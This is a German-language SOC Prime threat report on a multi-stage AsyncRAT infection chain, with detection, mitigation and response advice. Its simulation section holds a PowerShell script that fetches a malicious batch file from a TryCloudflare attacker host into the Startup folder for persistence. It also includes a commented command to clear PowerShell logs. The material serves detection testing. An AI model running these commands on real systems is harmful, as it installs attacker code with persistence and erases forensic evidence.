SOC Prime Bias: Kritisch

14 Jan 2026 15:04 UTC

Wie MDR eine mehrstufige AsyncRAT-Angriffskette aufgedeckt hat

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Wie MDR eine mehrstufige AsyncRAT-Angriffskette aufgedeckt hat
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht beschreibt eine mehrstufige Angriffskette, die mit Phishing-E-Mails beginnt, die ZIP-Anhänge mit doppelter Erweiterung enthalten, und in eine WebDAV-gehostete Payload-Sequenz übergehen. Die Betreiber missbrauchen die kostenlose Cloudflare-Infrastruktur und gebündelte Python-Komponenten, um AsyncRAT auf den Endgeräten der Opfer zu installieren. Die Ausführung und Persistenz basieren auf nativen Windows-Tools—Windows Script Host, PowerShell und Batch-Skripte—während die letzte Phase Code-Injection in explorer.exe verwendet. Durch die Nutzung von weit verbreiteten Cloud-Diensten für die Lieferung und Bereitstellung fügt sich die Aktivität in den normalen Datenverkehr ein und kann herkömmliche Zugriffskontrollen an der Peripherie umgehen.

Untersuchung

Trend Micro-Ermittler berichteten von Telemetriedaten, die mit einem gestaffelten Lieferfluss übereinstimmen: Abruf eines .pdf.zip-Archivs von Dropbox, Ausführung eingebetteter .url-Verknüpfungen und nachfolgende WebDAV-Interaktion, die svchost.exe und rundll32.exe zugeschrieben wird. Die Kette setzte dann eingebettete Dateien von Python 3.14.0 ein, die verwendet wurden, um ein benutzerdefiniertes Python-Skript auszuführen, das für die APC-Injektion von AsyncRAT Shellcode verantwortlich war. Die Persistenz wurde durch das Ablegen von Batch-Dateien im Benutzer-Startup-Verzeichnis erreicht. Analysten identifizierten und korrelierten auch mehrere TryCloudflare-Hosts, die die Infrastruktur unterstützten.

Minderung

Reduzieren Sie die Angriffsfläche, indem Sie Benutzer schulen, doppelte Erweiterungsarchive und unerwartete ZIP-Anhänge als verdächtig zu behandeln, und indem Sie die Filterung von Phishing-übermittelten Cloud-Links verschärfen. Blockieren oder kontrollieren Sie den Zugriff auf nicht genehmigte Cloud-Tunneling-Dienste streng und überwachen Sie eine ungewöhnliche Abhängigkeit von WebDAV in Umgebungen, in denen es selten ist. Beschränken Sie die Skriptausführung von benutzerbeschreibbaren Verzeichnissen und stärken Sie die Kontrollen im Zusammenhang mit der Nutzung von Startup-Ordnern und der Erstellung geplanter Aufgaben. Priorisieren Sie EDR/Verhaltenserkennungen, die skriptgesteuerte Ausführungsketten und Codeinjektionstechniken aufdecken können, die auf gutartige Prozesse abzielen.

Reaktion

Wenn eine Aktivität erkannt wird, isolieren Sie das Endgerät und stoppen Sie verdächtige Prozesse, die mit der Kette in Verbindung stehen (insbesondere svchost.exe, rundll32.exe und python.exe, wenn sie mit dem Vorfall in Verbindung stehen). Entfernen Sie die Persistenz, indem Sie bösartige Batch-Artefakte aus dem Startup-Verzeichnis löschen, herunterladen Sie Python-Archive und alle AsyncRAT-Komponenten und führen Sie einen vollständigen forensischen Scan für zusätzliche Staging-Dateien und laterale Bewegungen durch. Aktualisieren Sie Netzwerksteuerungen und Blocklisten, um die identifizierten TryCloudflare-Domains und jede damit verbundene bei der Triagestufe beobachtete Infrastruktur einzuschließen.

Angriffsfluss

Simulation der Ausführung

Voraussetzung: Telemetrie & Basislinien-Vorkontrolle muss bestanden haben.

  • Angriffsnarrativ & Befehle

    Ein Angreifer, der initialen PowerShell-Zugriff auf ein kompromittiertes Windows-Hostsystem erlangt hat, möchte eine Python-Ausführungsumgebung einrichten und Persistenz erreichen. Sie:

    1. Laden die eingebettete Python-Distribution herunter direkt auf den lokalen Benutzer Temp Verzeichnis mit Invoke‑WebRequest.
    2. Laden ein bösartiges Batch-Skript herunter (ahke.bat) von einer Cloudflare-proxied Domain in den Startup-Ordner des Benutzers, damit es bei jedem Anmelden ausgeführt wird.
    3. Führen das heruntergeladene Python-Zip aus (hier der Kürze halber weggelassen), um weitere Payloads auszuführen.

    Diese Schritte erzeugen genau die Befehlsstrings, die mit der Sigma-Regel übereinstimmen und PowerShell-Skriptblock-Logs mit dem iwr … -OutFile … Muster generieren.

  • Regressionstest-Skript

    # -------------------------------------------------
    # PowerShell-Simulation der AsyncRAT-Umgebungseinrichtung
    # -------------------------------------------------
    
    # 1. Lade Python-Embedded-Zip in das Benutzer-Temp-Verzeichnis
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. Lade bösartige Batch-Datei für Persistenz in Startup
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (Optional) Führe die Batch-Datei aus, um Persistenz zu demonstrieren
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • Bereinigungskommandos

    # Entferne die heruntergeladenen Artefakte
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # Optional: PowerShell-Skriptblock-Logs löschen (erfordert Admin)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"